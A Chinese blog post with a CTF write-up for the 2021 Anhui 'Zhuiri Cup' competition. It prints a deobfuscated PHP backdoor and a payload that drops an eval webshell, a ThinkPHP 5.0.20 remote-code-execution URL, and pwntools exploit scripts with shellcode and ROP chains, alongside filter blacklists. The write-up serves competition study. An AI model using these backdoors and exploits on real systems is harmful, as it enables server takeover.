2021首届安徽省“追日杯”wp

最新推荐文章于 2021-12-09 03:05:45 发布
最新推荐文章于 2021-12-09 03:05:45 发布
阅读量3.3k 收藏 1
点赞数
分类专栏: Web 文章标签: php 开发语言 安全漏洞 安全 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wanmiqi/article/details/121753972
版权

2021首届安徽省“追日杯”wp

安徽省内的比赛,拿了第二

web

伊泽瑞尔的php

原题:https://www.cnblogs.com/nul1/p/11516783.html

根据robots.txt找到.index.php.swp
代码被混淆了,
通过输出$C然后代码格式化得

$k="25ed1bcb";
$kh="423b0b7200f4";
$kf="85fc5ff71c8e";
$p="niGqOXD4rBhBWZ7t";
function x($t,$k) {
	$c=strlen($k);
	$l=strlen($t);
	$o="";
	for ($i=0;$i<$l;) {
		for ($j=0;($j<$c&&$i<$l);$j++,$i++) {
			$o.=$t {
				$i
			}
			^$k {
				$j
			}
			;
		}
	}
	return $o;
}
if (@preg_match("/$kh(.+)$kf/",@file_get_contents("php://input"),$m)==1) {
	@ob_start();
	@eval(@gzuncompress(@x(@base64_decode($m[1]),$k)));
	$o=@ob_get_contents();
	@ob_end_clean();
	$r=@base64_encode(@x(@gzcompress($o),$k));
	print("$p$kh$r$kf");
}

逆向一下

<?php
$k="25ed1bcb";
$kh="423b0b7200f4";
$kf="85fc5ff71c8e";
$p="niGqOXD4rBhBWZ7t";
function x($t,$k){
    $c=strlen($k);
    $l=strlen($t);
    $o="";
    for($i=0;$i<$l;){
        for($j=0;($j<$c&&$i<$l);$j++,$i++){
            $o.=$t{$i}^$k{$j};
        }
    }return $o;
}
$r=@base64_encode(@x(@gzcompress("system('echo PD9waHAKZXZhbCgkX1BPU1RbbWlkaV0pOwo/Pg== | base64 -d > /var/www/html/midi.php');"),$k));
echo $r;
?>

拼接$kh, $kf得
423b0b7200f4SqlOyh1MKq/nZSop/6o0akKESSvFEpfsuL2vLEMsrOwCQW9sBG4pKDj6rCo9UUuSHfqya3nV1jeaZC0uHSxWUWPlKDWBMbNNeRm3Sx5NtK0a/Ki1/q8vq+YerUxhtddkMoCCeq0=85fc5ff71c8e

post这段数据在根目录下写shell,然后读flag就行

gotofly

一直302跳转,查看响应头的长度,发现除了这两个其他都是0,再使用bp发包即可得到flag
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

综合渗透

thinkphp 5.0.20

http://82.156.76.152:8077/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20/flag

在这里插入图片描述
内网打不进 麻了

2_let_me_rce

<?php
highlight_file(__FILE__);
$cmd=$_GET['cmd'];
if(!preg_match('/sys|pass|exe|file|inc|cat| |\$|\?|\*|more|ca\t|nl|#| |[\x0a]|php|perl|dir|rm|ls|sleep|cut|sh|bash|grep|ash|nc|ping|curl|cat|tac|od|more|less|nl|vi|unique|head|tail|sort|rev|string|find|\$|\(\|\)|\[|\]|\{|\}|\>|\<|\?|\*|;|\||&|\\\\/i',$cmd)){
    eval("echo '" . $cmd ."';");
}else{
    echo "hacker";
}
?>

占坑等复现

babypickle


from flask import Flask
from flask import render_template
from flask import request
from flask import render_template_string
from flask import session
import base64
from base64 import b64encode,b64decode
import pickle
app = Flask(__name__)
@app.route('/',methods=['GET','POST'])
@app.route('/index',methods=['GET','POST'])
def index():
    template = '''
        <div class="center-content error">
            <h1>Pickle Pickle!<br>Entrance is: /evil?pikapika=your opcode After base64 encoded</h1>
        </div> 
    '''
    return render_template_string(template)
@app.route('/evil',methods=['GET','POST'])
def pick():
    if len(request.args.get("pikapika")) % 4 == 0:
        opcode = request.args.get("pikapika")
    else:
        return open(__file__).read()
    if(waf(b64decode(opcode).decode('utf-8'))):
        return "贴贴 hacker!"
    pickle.loads(b64decode(opcode))
    return open(__file__).read()
    
def waf(opcode):
    opcode = str(opcode)
    if True in (x in opcode for x in ['tR','ios','o']):
        return True
    return False
if __name__ == '__main__':
    app.debug = True
    app.run(host="0.0.0.0",port=80)

占坑等复现

ezsql

const express = require("express");
const cookieParser = require("cookie-parser");
const path = require('path');
const bodyParser = require('body-parser');
const hbs = require('hbs');
const mysql = require('mysql');
const session = require('express-session');
const sessionStore = require('session-file-store')(session);
// const homeRouter = require('./routes/home')
const app = express();
const connection = mysql.createConnection({
    host     : '127.0.0.1',
    user     : 'root',
    password : '123456',
    database : 'ctf'
});

app.use(session({
    name: "NSESSION",
    secret: ((length)=>{
                var result           = '';
                var characters       = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
                var charactersLength = characters.length;
                for ( var i = 0; i < length; i++ ) {
                  result += characters.charAt(Math.floor(Math.random() *  charactersLength));
               }
               return result;
            })(50),
    store: new sessionStore(path.join(__dirname, "sessions/")),
    saveUninitialized: false,
    resave: false,
    cookie: { maxAge: 100 * 60 * 600}
}));

app.use(express.static(path.join(__dirname, 'public')));
app.use(cookieParser());
app.disable('x-powered-by')
app.set('views', path.join(__dirname, "views/"))
app.set('view engine', 'html');
app.engine('html', hbs.__express);
app.use(bodyParser.urlencoded({extended: false}));
app.use(bodyParser.json());
app.use(cookieParser());
// app.use('/home', homeRouter)

app.use(function(error, req, res, next) {
    if (error) {
        res.end("Error:", error.toString());
    }
});

connection.connect()

let sqlFilter = (data) => {
    let blacklist = ['select', 'substr', 'load_file','ascii', 'mid', 'left', 'right', 'and', 'if', 'case', 'when', '0x', 'hex', 'char', 'update', 'extract', 'trim', '*', 'exp', 'cot', ' ', '=', '>', '<', '+','regexp', 'like', 'count', 'between', 'union', 'concat', '^', 'sleep', 'benchmark', 'information', 'lock']
    let flag = false
    blacklist.forEach((value, idx) => {
        if (data.includes(value)) {
            console.log(`filter: ${value}`);
            return (flag = true);
        }
    });
    return flag
}


app.get('/home', (req, res)=>{
    if (req.session.username)
        return res.render('home',{name: req.session.username})
    res.render('login')
})

// debug router
app.get('/getflag', (req, res)=>{
    if (req.session.username === 'admin')
        return res.sendfile(path.join(req.query.file))
    return res.send('You are not admin')
})
app.get('/', (req, res)=>{
    if (req.session.username)
        return res.redirect('/home')
    res.render('login')
})

app.get('/source', (req, res) => {
    res.sendfile(path.join(__dirname, 'app.js'))
})

app.post('/login', async  (req, res)=>{
    if (req.session.username)
        return res.redirect('/home')
    let {password} = req.body
    if (typeof password === 'string' && !sqlFilter(password)) {
        console.log(`select * from users where username = 'admin' and password = '${password}'`)
        await connection.query(`select * from users where username = 'admin' and password = '${password}'`,  function (error, results, fields) {
            if (error) return res.end('error');
            if (results[0] && results[0].password === password  ) {
                req.session.username = results[0].username
                return res.redirect('/home/index')
            } else
                return res.end('wrong password~~, why not try: /source')
        });
    } else {
        res.end("baby hack!")
    }
})

app.listen( 80 , '0.0.0.0', () =>{
    console.log("listening: 80")
});

占坑等复现

MISC

偷走的flag

Url解码+盲文解码得到前半段flag flag{As1de_From_implem

这个也是rar压缩包的密码,解压用0宽解密得到
在这里插入图片描述
最后拼接一下正常字符就行了
flag{As1de_From_implem3ntat1on-I_forg1ve_y0u}

阵法的奥秘

提示:
四位的char可以构造一个特殊字符

只有icmp报文

占坑等复现

CRYPTO

esayRSA

hint2 = 2021*p**3 + 2020 + 2019*p**2

使用sagement分解得到

num=4081589335861545789835900064099635357096399307337433897589803884626402434977432990016139226375481290410727489054239869962196583881117103323966736211566475539446678319618093115175112507069500173061215448325773249332796885624377362206444530510862480133054015065963334293387568286441905700716121965839808869357354006128877042545439515369257271569914721144973246451659098340370835404858757446411467741537214371880806558890311566169561294743201198192296369009590146133590
R.<x>=Zmod(y)[]
f=2021*x**3 + 2020 + 2019*x**2-num
f.roots()

p = 12640211216466775763050017481547933750912814131973813802729339716313957628118122130773233534260300514170797571411776745968647678621480594520108761936619731

通过公式推导得到c = pow(c,dp,p)

而dp = hint1

p = 12640211216466775763050017481547933750912814131973813802729339716313957628118122130773233534260300514170797571411776745968647678621480594520108761936619731
c=25562696992733536309182393779981779194240154099429561071032280334763645594896471389578060860342401623942484948987716140390982592619521666792424752334479246961649746061040166020085170757237115563084113762532741403917411315342519136738879919867100264184573200481028092895743894796816962164203221470918044930335749213176218455777516922130048195365976773635904361747281900075574599122502341481491609282116651135302435182241327211649334973233884028113185901584769019028117675925853042867198133957188908318016744666365319241377018102421574351449756122789387653293735302629918910002538784361049010374950779639892697081213057
dp=5260952459703133229911581653786151165351615592380635657675026312493642098695058018540694433892583077117305420684484097529438374197142471836138466810277803print(long_to_bytes(pow(c,dp,p)))
#flag{wow_you_know_it!}

PWN

codehome

from pwn import *
context.log_level='debug'
if args.Q:
   io=remote("1.116.140.142",60020)
else:
   io=process("./codehome")
​
sla=lambda a,b :io.sendafter(a,b)
def login(leng,name,code):
   sla(">>",str(leng))
   sla(">>",name)
   sla(">>",code)if __name__=="__main__":
   #gdb.attach(io)#1207
   payload="Ph0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M3T3K0q065K8O1N0Z070j2A1l2u4x4H0Z1k0h08050j"
   print(hex(len(payload)))
   login(0x24,'8'*0x1c+p64(0x44440000),payload)
   io.interactive()

esaystack

from pwn import *
context.log_level='debug'
if args.Q:
    io=remote("1.116.140.142",8802)
else:
    io=process("./easystack_9df6caaa66")
elf=ELF("./easystack_9df6caaa66")
sla=lambda a,b :io.sendlineafter(a,b)
p_a_b_c_r=0x080492fc
if __name__=="__main__":
    #gdb.attach(io,"b *0x804945d")
    sla("< \n","a"*(0x10-0x4)+p32(0x8049250)+p32(p_a_b_c_r)+p32(0x0804A05A-1)+p32(0)*2+p32(0x80492c0)+p32(0xdeadbeef)+p32(3)+p32(0x32)+p32(0x0804C120))
    io.interactive()
ISMidi
关注
专栏目录
VMware Harbor 使用过程中遇到的问题 1 -- 无法上传docker镜像
XuYongshi02的专栏
06-08 1万+
问题描述: 使用 HTTP 模式安装好了 VMware Harbor,但是, 使用的时候发现: 使用docker push 命令推镜像的时候, 失败了,  自然, web界面上也看不到镜像。 解决办法要点: 1.  确认配置正确,  可以 独立 run 一个registry的容器,实验一下配置是否正确 2.  使用docker login 命令先登录 docker
信息安全 数据赛 铁人三项_2018信息安全铁人三项数据赛题解
weixin_39533432的博客
12-19 1100
前言由于自己赛区的铁三比赛在最后一场,于是利用闲暇时间做了一下别的赛区的题目,这里给出5月5号比赛的数据赛做题记录题目分享:链接: https://pan.baidu.com/s/1b6bkW-J8vKASr8C2r9vsdQ 密码: nux4题目描述1.黑客攻击的第一个受害主机的网卡IP地址2.黑客对URL的哪一个参数实施了SQL注入3.第一个受害主机网站数据库的表前缀(加上下划线 例如abc_...
首届安徽省追日杯”大学生网络安全挑战赛WriteUp
Tajang的大千世界
12-09 4851
第六,应该能混个三等奖 题量很大,打的人少,很多题都是0解,Reverse全0解,其他方向大都是个位数,综合渗透那里,题特别多,做了一个第一题就没做了,也挺难的,但是分还很低。怪怪的。 Web gotofly 题目一直重定向,即使到了flag页面,立即刷新也看不见,BP直接抓包,一页一页翻就行了 Misc chess 半自动化脚本 # -- coding=utf8 -- from pwn import * io=remote("ctf.zrb.edisec.net",33741) win_data='
攻防世界 web高手进阶区 7分题 Web_php_wrong_nginx_config
闵行小鱼塘
08-04 1972
继续ctf的旅程,攻防世界web高手进阶区的7分题,本文是Web_php_wrong_nginx_config的writeup
知识竞赛系统 php,贵州省网络安全知识竞赛团体赛Writeup-phpweb部分
weixin_39812465的博客
03-11 172
0x01 混淆后门#conn.php首先还是拖到D盾扫描 打开conn.php发现底部有那么一串代码: 对这个代码进行分析首先可以对几个比较简单的变量输出看一下$s输出内容为create_function29行可知匿名函数调用了$q中的代码,所以我们打印$q的内容看一下 $q的内容为:$k="5ac91f7d";$kh="b9615a29bc1d";$kf="24d0b67c2c91";$p="9...
首届安徽省追日杯”大学生网络安全挑战赛.zip
12-07
CTF 追日杯 决赛 2021
追日电气:2021年半年度报告.PDF
08-29
2. **技术创新与产品应用**:2021年4月,追日电气推出的大功率直流充电桩成功配套柳工纯电动装载机,用于特殊作业环境,如安徽煤矿和川藏铁路隧道,并远销印度尼西亚,显示了其在新能源工程车辆充电技术的领先实力。...
追日电气:2021年半年度报告.rar
09-29
《追日电气:2021年半年度报告》是一个重要的文档,它全面反映了追日电气公司在2021年上半年的经营状况、财务表现以及业务发展情况。这篇报告是投资者、分析师、媒体以及所有关心该公司动态的人员获取企业最新信息的...
基于ATmega32单片机主动式太阳能追日系统设计
08-08
主动式太阳能追日系统设计是提高太阳能利用效率的关键技术之一,尤其在太阳能电池板和集热器的应用中。本文着重探讨了一种基于ATmega32单片机的主动式追日系统,旨在解决传统被动式跟踪系统存在的问题,提高系统的...
太阳能追日系统挡光率表
05-12
槽式太阳能追日系统,挡光率计算表,此表比较详细计算了一些遮阳情况
Weevely使用及源码分析(三)
fly小灰灰的专栏
01-30 1796
1 weevely验证机制分析 1.1 源码分析    当生成的php文件是以stegaref_php.tpl文件为模板时,当我们在连接时的命令行中输入任意命运就可以触发php.py文件中的_check_interpreter()函数,_check_interpreter()函数主要功能是随机生成一个命令,”echo”一个从11111到99999大小的随机整数,然后分别调用channels
Android客户端实现注册/登录详解(二)
热门推荐
benhuo931115的博客
04-06 3万+
上文中介绍了安卓客户端与服务器交互,实现注册功能Android客户端实现注册/登录详解(一)本文将继续介绍App与服务器的交互实现登录和自动登录的功能,上文说到请求服务器进行注册主要是通过POST请求携带参数实现,起作用的代码主要是 StringRequest request=new StringRequest(Method.POST, url, new Listener<String>()
Python_迭代器、生成器、列表推导式,生成器表达式
davidlee1214的博客
06-02 6660
1、迭代器   (1)可迭代对象 1 s1 = '123' 2 for i in s1: 3 print(i) 可迭代对象   示例结果: D:\Python36\python.exe "E:/Python/课堂视频/day13视频与课堂笔记/day13课堂笔记/day13/02 迭代器.py" 1 2 3 True False ...
java实现文件上传下载至ftp服务器
菜鸟升职记的专栏
05-06 8720
以前做的一个项目,用到了文件上传下载至ftp服务器,现在对其进行一下复习,比较简单,一下就能看明白。 环境:首先,先安装ftp服务器,我是在win8本地用IIS配置的,比较简单,百度一下就可以找到安装文档。 1.在你的项目目录下建立ftp配置文件,目录如下图01 ftpconfig.properties:ftpIp=10.73.222.29 ftpPort=21 ftpUser=WP ftpP
pwn题shellcode收集
lifanxin的博客
02-25 4871
Write Upshellcode shellcode 这里对pwn中使用到的shellcode做了一个汇总,方便大家参考和使用。 # 32位 短字节shellcode --> 21字节 \x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80 # 32位 纯ascii字符shellcode PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0
mrctf2020_shellcode_revenge(不用仔细分析汇编)
CsCN_的博客
07-10 402
日常拖进IDA一看,发现不能反编译,原因是0x124D位置有个call rax 然后看了一下汇编,发现又臭又长,由于本人还没有学汇编,有些地方看不懂 所以我干脆直接在IDA里面改汇编,把call rax改成call main就能反编译了 一目了然 稍加分析便能发现输入字符必须要在(47,122]里,也就是从0到z 图源:百度百科,侵删 后面的问题就变成怎样把用这些字符写出shellcode了 看了一些大佬们用alpha3重定向一下就能搞出shellcode,详见大.
2021全国大学生信息安全竞赛初赛部分WP
weixin_45844670的博客
05-17 4076
第一阶段 Misc tiny traffic 分析pcap包,能发现几个可疑的请求——/flag_wrapper、/test、/secret,分别把它们传输的文件提取出来,得到三个压缩包,通过flag.gzip的内容可以确认这个IP就是我们要分析的IP 再使用Peazip分别提取secret和test的压缩包,能发现传输的格式规范 syntax = "proto3"; message PBResponse { int32 code = 1; int64 flag_part_convert_to_h
[BUUCTF-pwn]——mrctf2020_shellcode_revenge(可见字符shellcode)(内涵peak小知识)
Y_peak的博客
03-29 1279
[BUUCTF-pwn]——mrctf2020_shellcode_revenge(可见字符shellcode) 检查了下保护发现NX 没有开,肯定要自己写shellcode呀。 不过这道题,刷新了我的认知。众所周知,手写的shellcode里面肯定有很多不可见字符。第一次碰到可见的shellcode。 看下IDA, 不能反汇编不过问题不大,没事. 个人建议,看汇编的时候,建议看流程图,更加直观 将shellcode写入,那个buf 不过下面肯定大于0呀.rbp + var_8是我们输入字符串的长度.发生转
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值